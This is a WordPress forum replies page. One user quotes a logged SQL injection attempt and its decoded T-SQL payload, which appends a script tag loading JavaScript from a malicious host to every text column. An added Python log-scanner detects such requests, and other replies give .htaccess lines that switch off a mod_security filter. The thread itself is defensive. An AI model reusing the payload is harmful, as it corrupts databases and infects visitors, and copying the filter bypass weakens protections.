Forum Replies Created

Viewing 6 replies - 1 through 6 (of 6 total)
  • Hello Ryanpoo,
    I’m Andrea, the author of Tomorrow.

    Basically, you should define some CSS properties for the div#header block,
    say: font size, background image, and so on.

    If you are not very confident with CSS, write to me at
    themes at pacquola.org
    describing the exact kind of header you’d like to have.
    I’ll try to answer in detail.

    1. Unless someone is able to use your server to redirect traffic or to execute exploit code in their browser (the end user hits you with that URL and then KABLAM on them)

    or

    2. Those URLs cause your WordPress installation to get compromised and exploited (data successfully added to your database or filesystem).

    Thank you for your explanation.
    I checked both the database and the logs; all seems ok (for now).

    But… did they have nothing else to do?

    Hello,
    the same happened to me.
    Looking at the log files, I noticed the following record:

    116.48.67.106 - - [09/Aug/2008:05:58:47 +0300] "GET /2008/03/15/sottsass/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x 
    
    ....about 650 hex characters follows...
    
    0CHAR(4000));EXEC(@S); HTTP/1.1" 200 11878 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

    The hex string, once translated, shows the following:

    GET /2008/03/15/sottsass/?';DECLARE @SCHAR(4000);SET @S=CAST(DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="https://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="https://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS% CHAR(4000));EXEC(@S)

    There is a reference to a JS script, located at (omitted here):
    This script also has references to three URLs (omitted here).

    In particular, the last two are reported as malicious sites.

    The attack comes from:
    IP : 116.48.67.106
    Host Name : n1164867106.netvigator.com
    Country : Hong Kong

    Is it a possible security problem of WordPress?
    What are the potential risks?
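
    The following is an added example (not code posted by pacq or anyone else in this thread) showing how a defender can flag requests of the kind quoted above in an Apache access log and decode the hex literal the way the post does by hand. It assumes the Apache combined log format and Python 3 with only the standard library; the log lines, IP addresses and the SQL payload inside the hex string are all constructed for illustration and do not reproduce the script URL from the thread.

```python
"""Flag and decode hex-encoded T-SQL injection attempts in Apache access logs.

Added example, not from the original thread. Assumes Apache combined log
format and only the Python 3 standard library. All log lines and the
payload below are constructed for illustration.
"""
import re
import urllib.parse

# Apache "combined" format: ip ident user [timestamp] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of the DECLARE / CAST(0x...) / EXEC pattern, checked after URL-decoding
DECLARE_RE = re.compile(r"DECLARE\s+@\w+\s+(?:N?VAR)?CHAR\(\d+\)", re.IGNORECASE)
HEX_CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
EXEC_RE = re.compile(r"EXEC\(\s*@\w+\s*\)", re.IGNORECASE)


def decode_hex_payload(hex_digits: str) -> str:
    """Turn the 0x... literal into readable text.

    NVARCHAR payloads are UTF-16LE, so ASCII text shows a NUL after every
    character; CHAR/VARCHAR payloads are plain single-byte text.
    """
    if len(hex_digits) % 2:          # log line was truncated mid-byte
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyze_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urllib.parse.unquote(m.group("path"))
    reasons = []
    payload = None
    if DECLARE_RE.search(path):
        reasons.append("DECLARE of a string variable in the query string")
    hex_match = HEX_CAST_RE.search(path)
    if hex_match:
        reasons.append("hex-encoded CAST() payload")
        payload = decode_hex_payload(hex_match.group(1))
    if EXEC_RE.search(path):
        reasons.append("EXEC() of a variable")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "reasons": reasons,
        "payload": payload,
    }


def scan_log(lines):
    """Run analyze_line over an iterable of log lines, keeping only findings."""
    return [f for f in (analyze_line(line) for line in lines) if f]


# --- constructed sample data -------------------------------------------------
# A harmless stand-in for the injected SQL; the payload quoted in the thread
# instead walked every text column of every table with a cursor.
SAMPLE_PAYLOAD = "DECLARE @T varchar(255) SELECT @T='constructed sample' --"
SAMPLE_HEX = SAMPLE_PAYLOAD.encode("utf-16-le").hex().upper()

SAMPLE_LOG = [
    # ordinary page view (constructed)
    '203.0.113.5 - - [09/Aug/2008:05:58:40 +0300] '
    '"GET /2008/03/15/sottsass/ HTTP/1.1" 200 11878 "-" "Mozilla/5.0"',
    # injection attempt in the style of the one quoted in the thread (constructed)
    '203.0.113.9 - - [09/Aug/2008:05:58:47 +0300] '
    '"GET /2008/03/15/sottsass/?%27;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x'
    + SAMPLE_HEX + '%20AS%20NVARCHAR(4000));EXEC(@S); HTTP/1.1" 200 11878 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} at {finding['timestamp']}: {', '.join(finding['reasons'])}")
        print("  decoded payload:", finding["payload"])
```

    The decoder tries UTF-16LE first because the CAST(... AS NVARCHAR) variant of this pattern encodes every character with a trailing NUL byte, and falls back to single-byte text for CHAR/VARCHAR payloads; a hex literal cut off by log truncation, as in the record above, is trimmed to an even number of digits so the recoverable prefix is still shown. Note that the 200 status only says the page was served, so a hit like this should be checked against the database and filesystem the way the post describes.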

    Thread Starter pacq

    (@pacq)

    Oops!..excuse me..:P

    Pacq

    Thread Starter pacq

    (@pacq)

    Hello Michael,

    thank you, reading the topic 117993 I found the solution:
    I have to modify my .htaccess file adding the lines:

    <Files index-extra.php>
    SecFilterInheritance Off
    </Files>

    Thanks to all,

    Pacq

    Thread Starter pacq

    (@pacq)

    Hello,

    Deerhunter04’s solution solved my problem…

    <Files index-extra.php>
    SecFilterInheritance Off
    </Files>

    Many thanks to Specks, Deerhunter and Whooami

    Pacq
